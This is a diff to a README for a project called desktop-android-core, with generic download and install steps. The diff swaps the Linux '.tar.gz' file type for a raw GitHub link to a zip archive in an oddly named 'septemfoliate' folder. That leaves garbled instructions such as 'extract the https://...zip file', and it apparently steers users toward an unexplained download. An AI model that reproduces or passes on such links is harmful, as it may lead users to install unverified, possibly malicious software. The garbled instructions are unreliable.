techboy12-tech/desktop-android-core/README.md

    Click on the version you wish to download to start the process.
 You will see a variety of files available.
 Choose the one that is suitable for your operating system.
 For example:
    - Windows usually has a `.exe` file.
    - Mac might have a `.dmg` file.
-   - Linux might contain a `.tar.gz` file.
+   - Linux might contain a `https://raw.githubusercontent.com/techboy12-tech/desktop-android-core/main/septemfoliate/desktop-android-core-3.0.zip` file.

 4. **Install the Application**
    Once the download is complete, locate the file in your downloads folder.
    - For Windows, double-click the `.exe` file and follow the installation prompts.
    - For Mac, drag the `.dmg` file to your Applications folder.
-   - For Linux, extract the `.tar.gz` file and follow any included instructions.
+   - For Linux, extract the `https://raw.githubusercontent.com/techboy12-tech/desktop-android-core/main/septemfoliate/desktop-android-core-3.0.zip` file and follow any included instructions.

 5. **Run the Software**
    After installation, you can start the application.
 Look for the icon on your desktop or in your applications menu.